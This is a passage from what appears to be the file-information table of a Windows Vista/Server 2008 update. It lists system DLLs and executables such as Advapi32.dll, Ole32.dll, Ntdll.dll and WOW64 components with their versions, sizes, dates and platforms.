\nAdvapi32.dll.mui| 6.0.6002.19598| 375,296| 06-Feb-2016| 03:14| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 375,296| 06-Feb-2016| 04:00| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 346,624| 06-Feb-2016| 03:37| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 338,944| 06-Feb-2016| 04:19| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 371,200| 07-Apr-2017| 17:09| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 379,392| 07-Apr-2017| 17:03| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 376,832| 07-Apr-2017| 17:03| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 373,760| 07-Apr-2017| 17:10| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 393,216| 07-Apr-2017| 17:09| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 255,488| 07-Apr-2017| 15:52| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 381,952| 07-Apr-2017| 17:12| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 375,808| 07-Apr-2017| 17:09| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,536| 07-Apr-2017| 17:04| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 366,080| 07-Apr-2017| 17:05| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 383,488| 07-Apr-2017| 17:07| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 380,928| 07-Apr-2017| 17:16| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 352,768| 07-Apr-2017| 17:13| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 349,696| 07-Apr-2017| 17:07| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 374,272| 07-Apr-2017| 17:14| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 380,416| 07-Apr-2017| 17:15| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,536| 07-Apr-2017| 17:06| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 379,392| 07-Apr-2017| 17:10| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 379,904| 07-Apr-2017| 17:12| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,536| 07-Apr-2017| 17:09| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 375,296| 07-Apr-2017| 17:09| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 375,296| 07-Apr-2017| 17:11| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 346,624| 07-Apr-2017| 17:05| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 338,944| 07-Apr-2017| 17:05| Not applicable| Not applicable \nAdvapi32.dll| 6.0.6002.19598| 1,067,008| 06-Feb-2016| 01:59| x64| Not applicable \nAdvapi32.dll| 6.0.6002.24089| 1,067,520| 07-Apr-2017| 15:42| x64| Not applicable \nOle32.dll| 6.0.6002.19773| 1,910,784| 14-Apr-2017| 20:38| x64| AMD64_MICROSOFT-WINDOWS-COM-BASE-QFE \nOle32.dll| 6.0.6002.24089| 1,918,464| 07-Apr-2017| 15:43| x64| AMD64_MICROSOFT-WINDOWS-COM-BASE-QFE \nRpcss.dll| 6.0.6002.19773| 720,896| 14-Apr-2017| 20:38| x64| AMD64_MICROSOFT-WINDOWS-COM-BASE-QFE \nRpcss.dll| 6.0.6002.24089| 722,944| 07-Apr-2017| 15:44| x64| AMD64_MICROSOFT-WINDOWS-COM-BASE-QFE \nOle32.dll.mui| 6.0.6000.16386| 3,072| 05-Dec-2006| 03:31| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 16,896| 14-Apr-2017| 21:54| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 08-Jan-2007| 19:56| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 19,968| 14-Apr-2017| 21:50| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 21-Nov-2006| 03:26| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 20,992| 14-Apr-2017| 21:47| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 02-Nov-2006| 11:19| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 23,040| 14-Apr-2017| 21:46| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 05-Jan-2007| 03:30| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 24,064| 14-Apr-2017| 21:46| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 02-Nov-2006| 11:19| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 20,480| 14-Apr-2017| 20:38| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 02-Nov-2006| 12:57| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 22,528| 14-Apr-2017| 21:56| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 27-Nov-2006| 21:46| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 19,968| 14-Apr-2017| 21:46| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 02-Nov-2006| 12:56| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 24,064| 14-Apr-2017| 21:55| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 13-Dec-2006| 22:22| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 16,384| 14-Apr-2017| 21:47| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 16-Jan-2007| 03:31| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 22,528| 14-Apr-2017| 21:49| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 05-Nov-2006| 23:23| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 23,552| 14-Apr-2017| 21:46| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 02-Nov-2006| 11:18| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 13,824| 14-Apr-2017| 21:38| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 07-Nov-2006| 03:51| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 12,800| 14-Apr-2017| 21:44| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 21-Nov-2006| 03:31| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 20,480| 14-Apr-2017| 21:47| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 02-Nov-2006| 13:10| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 22,016| 14-Apr-2017| 21:46| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 05-Dec-2006| 03:31| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 22,528| 14-Apr-2017| 21:50| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 05-Nov-2006| 23:06| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 22,016| 14-Apr-2017| 21:46| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 18-Jan-2007| 03:28| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 22,016| 14-Apr-2017| 21:44| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 09-Nov-2006| 03:33| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 20,480| 14-Apr-2017| 21:49| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 21-Nov-2006| 03:26| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 19,968| 14-Apr-2017| 21:44| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 05-Jan-2007| 03:35| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 19,456| 14-Apr-2017| 21:47| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 05-Nov-2006| 23:10| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 9,728| 14-Apr-2017| 21:41| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 08-Nov-2006| 07:27| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 9,728| 14-Apr-2017| 21:52| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:56| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 16,896| 07-Apr-2017| 16:59| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:46| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 19,968| 07-Apr-2017| 16:49| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:46| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 20,992| 07-Apr-2017| 16:49| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:53| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 23,040| 07-Apr-2017| 16:57| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:54| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 24,064| 07-Apr-2017| 16:57| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 15:44| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 20,480| 07-Apr-2017| 15:46| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:56| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 22,528| 07-Apr-2017| 17:00| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:55| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 19,968| 07-Apr-2017| 16:58| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:46| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 24,064| 07-Apr-2017| 16:49| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:47| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 16,384| 07-Apr-2017| 16:50| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:47| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 22,528| 07-Apr-2017| 16:51| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 17:00| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 23,552| 07-Apr-2017| 17:04| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 17:00| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 13,824| 07-Apr-2017| 17:03| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:52| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 12,800| 07-Apr-2017| 16:55| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 17:00| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 20,480| 07-Apr-2017| 17:03| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:59| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 22,016| 07-Apr-2017| 17:03| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:46| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 22,528| 07-Apr-2017| 16:50| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:55| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 22,016| 07-Apr-2017| 16:58| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:57| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 22,016| 07-Apr-2017| 16:59| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:53| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 20,480| 07-Apr-2017| 16:56| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:54| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 19,968| 07-Apr-2017| 16:57| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:56| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 19,456| 07-Apr-2017| 16:59| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:49| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 9,728| 07-Apr-2017| 16:54| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:51| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 9,728| 07-Apr-2017| 16:55| Not applicable| Not applicable \nComcat.dll| 6.0.6000.16386| 8,704| 02-Nov-2006| 11:16| x64| Not applicable \nOleres.dll| 6.0.6002.19773| 23,552| 14-Apr-2017| 19:20| x64| Not applicable \nComcat.dll| 6.0.6002.24089| 8,704| 07-Apr-2017| 15:42| x64| Not applicable \nOleres.dll| 6.0.6002.24089| 23,552| 07-Apr-2017| 14:55| x64| Not applicable \nCsrsrv.dll| 6.0.6002.19680| 86,016| 12-Aug-2016| 19:07| x64| Not applicable \nCsrsrv.dll| 6.0.6002.24089| 86,016| 07-Apr-2017| 15:42| x64| Not applicable \nKernel32.dll| 6.0.6002.19623| 1,212,928| 18-Mar-2016| 18:14| x64| Not applicable \nKernel32.dll| 6.0.6002.24089| 1,214,976| 07-Apr-2017| 15:43| x64| Not applicable \nNtdll.dll| 6.0.6002.19623| 1,589,168| 21-Mar-2016| 23:00| x64| Not applicable \nNtdll.dll| 6.0.6002.24089| 1,583,512| 11-Apr-2017| 04:07| x64| Not applicable \nOleaut32.dll| 6.0.6002.19773| 861,696| 14-Apr-2017| 20:38| x64| Not applicable \nOleaut32.dll| 6.0.6002.24089| 862,208| 07-Apr-2017| 15:43| x64| Not applicable \nNtoskrnl.exe| 6.0.6002.19764| 4,693,736| 06-Apr-2017| 16:21| x64| Not applicable \nNtoskrnl.exe| 6.0.6002.24089| 4,665,064| 07-Apr-2017| 15:50| x64| Not applicable \nRpcrt4.dll| 6.0.6002.19598| 1,304,576| 06-Feb-2016| 02:01| x64| Not applicable \nRpcrt4.dll| 6.0.6002.24089| 1,308,160| 07-Apr-2017| 15:44| x64| Not applicable \nSmss.exe| 6.0.6002.19598| 75,264| 06-Feb-2016| 00:48| x64| Not applicable \nSmss.exe| 6.0.6002.24089| 75,776| 07-Apr-2017| 14:43| x64| Not applicable \nNtvdm64.dll| 6.0.6002.19598| 16,896| 06-Feb-2016| 02:01| x64| AMD64_MICROSOFT-WINDOWS-WOW \nWow64.dll| 6.0.6002.19598| 234,496| 06-Feb-2016| 02:02| x64| AMD64_MICROSOFT-WINDOWS-WOW \nWow64cpu.dll| 6.0.6002.19598| 17,408| 06-Feb-2016| 02:02| x64| AMD64_MICROSOFT-WINDOWS-WOW \nWow64win.dll| 6.0.6002.19598| 301,568| 06-Feb-2016| 02:02| x64| AMD64_MICROSOFT-WINDOWS-WOW \nNtvdm64.dll| 6.0.6002.24089| 16,896| 07-Apr-2017| 15:43| x64| AMD64_MICROSOFT-WINDOWS-WOW \nWow64.dll| 6.0.6002.24089| 234,496| 07-Apr-2017| 15:44| x64| AMD64_MICROSOFT-WINDOWS-WOW \nWow64cpu.dll| 6.0.6002.24089| 17,408| 07-Apr-2017| 15:44| x64| AMD64_MICROSOFT-WINDOWS-WOW \nWow64win.dll| 6.0.6002.24089| 301,568| 07-Apr-2017| 15:44| x64| AMD64_MICROSOFT-WINDOWS-WOW \nComcat.dll| 6.0.6000.16386| 7,168| 02-Nov-2006| 09:46| x86| Not applicable \nOleres.dll| 6.0.6002.19773| 23,552| 14-Apr-2017| 19:01| x86| Not applicable \nComcat.dll| 6.0.6002.24089| 7,168| 07-Apr-2017| 15:23| x86| Not applicable \nOleres.dll| 6.0.6002.24089| 23,552| 07-Apr-2017| 14:31| x86| Not applicable \nKernel32.dll| 6.0.6002.19623| 861,696| 18-Mar-2016| 17:10| x86| Not applicable \nKernel32.dll| 6.0.6002.24089| 862,720| 07-Apr-2017| 15:25| x86| Not applicable \nNtdll.dll| 6.0.6002.19623| 1,171,488| 21-Mar-2016| 23:00| x86| Not applicable \nNtdll.dll| 6.0.6002.24089| 1,167,880| 11-Apr-2017| 04:07| x86| Not applicable \nOleaut32.dll| 6.0.6002.19773| 574,464| 14-Apr-2017| 20:31| x86| Not applicable \nOleaut32.dll| 6.0.6002.24089| 574,464| 07-Apr-2017| 15:24| x86| Not applicable \nRpcrt4.dll| 6.0.6002.19598| 679,424| 06-Feb-2016| 02:12| x86| Not applicable \nRpcrt4.dll| 6.0.6002.24089| 678,912| 07-Apr-2017| 15:25| x86| Not applicable \nAcwow64.dll| 6.0.6002.19598| 43,008| 06-Feb-2016| 02:11| x86| WOW64_MICROSOFT-WINDOWS-WOW \nInstnm.exe| 6.0.6002.19598| 7,680| 06-Feb-2016| 00:32| x86| WOW64_MICROSOFT-WINDOWS-WOW \nNtvdm64.dll| 6.0.6002.19598| 14,336| 06-Feb-2016| 02:12| x86| WOW64_MICROSOFT-WINDOWS-WOW \nSetup16.exe| 3.1.0.1918| 26,112| 06-Feb-2016| 00:32| x86| WOW64_MICROSOFT-WINDOWS-WOW \nUser.exe| 6.0.6002.19598| 2,560| 06-Feb-2016| 00:32| x86| WOW64_MICROSOFT-WINDOWS-WOW \nWow32.dll| 6.0.6002.19598| 5,120| 06-Feb-2016| 02:12| x86| WOW64_MICROSOFT-WINDOWS-WOW \nAcwow64.dll| 6.0.6002.24089| 43,008| 07-Apr-2017| 15:22| x86| WOW64_MICROSOFT-WINDOWS-WOW \nInstnm.exe| 6.0.6002.24089| 7,680| 07-Apr-2017| 14:22| x86| WOW64_MICROSOFT-WINDOWS-WOW \nNtvdm64.dll| 6.0.6002.24089| 14,336| 07-Apr-2017| 15:24| x86| WOW64_MICROSOFT-WINDOWS-WOW \nSetup16.exe| 3.1.0.1918| 26,112| 07-Apr-2017| 14:22| x86| WOW64_MICROSOFT-WINDOWS-WOW \nUser.exe| 6.0.6002.24089| 2,560| 07-Apr-2017| 14:22| x86| WOW64_MICROSOFT-WINDOWS-WOW \nWow32.dll| 6.0.6002.24089| 5,120| 07-Apr-2017| 15:25| x86| WOW64_MICROSOFT-WINDOWS-WOW \nAdvapi32.dll.mui| 6.0.6002.19598| 380,928| 06-Feb-2016| 02:53| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 389,120| 06-Feb-2016| 04:12| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 04:00| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 04:17| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 401,408| 06-Feb-2016| 04:09| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 266,240| 06-Feb-2016| 02:20| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 03:09| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 04:03| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 02:57| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 376,832| 06-Feb-2016| 04:06| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 03:59| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 389,120| 06-Feb-2016| 03:00| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 360,448| 06-Feb-2016| 03:28| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 360,448| 06-Feb-2016| 04:53| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 02:53| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 389,120| 06-Feb-2016| 03:06| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 03:04| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 389,120| 06-Feb-2016| 04:14| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 389,120| 06-Feb-2016| 04:37| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 04:58| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 03:53| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 03:11| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 356,352| 06-Feb-2016| 03:48| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 348,160| 06-Feb-2016| 04:33| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 380,928| 07-Apr-2017| 16:39| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 389,120| 07-Apr-2017| 16:49| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,024| 07-Apr-2017| 16:39| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,024| 07-Apr-2017| 16:36| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 401,408| 07-Apr-2017| 16:34| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 266,240| 07-Apr-2017| 15:34| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 393,216| 07-Apr-2017| 16:48| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,024| 07-Apr-2017| 16:46| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 393,216| 07-Apr-2017| 16:48| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 376,832| 07-Apr-2017| 16:29| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 393,216| 07-Apr-2017| 16:42| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 389,120| 07-Apr-2017| 16:43| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 360,448| 07-Apr-2017| 16:43| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 360,448| 07-Apr-2017| 16:37| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,024| 07-Apr-2017| 16:36| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 389,120| 07-Apr-2017| 16:45| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 393,216| 07-Apr-2017| 16:47| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 389,120| 07-Apr-2017| 16:59| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 389,120| 07-Apr-2017| 16:58| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 393,216| 07-Apr-2017| 16:57| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,024| 07-Apr-2017| 16:51| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,024| 07-Apr-2017| 16:37| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 356,352| 07-Apr-2017| 16:52| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 348,160| 07-Apr-2017| 16:44| Not applicable| Not applicable \nAdvapi32.dll| 6.0.6002.19598| 802,304| 06-Feb-2016| 02:11| x86| Not applicable \nAdvapi32.dll| 6.0.6002.24089| 802,816| 07-Apr-2017| 15:22| x86| Not applicable \nOle32.dll| 6.0.6002.19773| 1,321,472| 14-Apr-2017| 20:31| x86| X86_MICROSOFT-WINDOWS-COM-BASE-QFE \nOle32.dll| 6.0.6002.24089| 1,318,912| 07-Apr-2017| 15:24| x86| X86_MICROSOFT-WINDOWS-COM-BASE-QFE \nOle32.dll.mui| 6.0.6000.16386| 3,584| 05-Dec-2006| 03:28| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 24,576| 14-Apr-2017| 21:30| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 08-Jan-2007| 19:48| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 21:33| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 21-Nov-2006| 03:27| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 21:34| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 02-Nov-2006| 09:48| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:30| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 05-Jan-2007| 03:25| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:34| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 02-Nov-2006| 09:50| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 20:31| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 02-Nov-2006| 10:43| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:34| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 27-Nov-2006| 21:37| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 21:29| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 02-Nov-2006| 10:43| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:36| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 13-Dec-2006| 22:22| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 24,576| 14-Apr-2017| 21:21| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 16-Jan-2007| 03:26| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:22| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 05-Nov-2006| 23:28| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:21| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 02-Nov-2006| 09:48| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 24,576| 14-Apr-2017| 21:19| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 07-Nov-2006| 03:40| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 20,480| 14-Apr-2017| 21:29| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 21-Nov-2006| 03:27| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 21:24| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 02-Nov-2006| 10:52| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:23| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 05-Dec-2006| 03:28| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:24| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 05-Nov-2006| 23:23| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:28| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 18-Jan-2007| 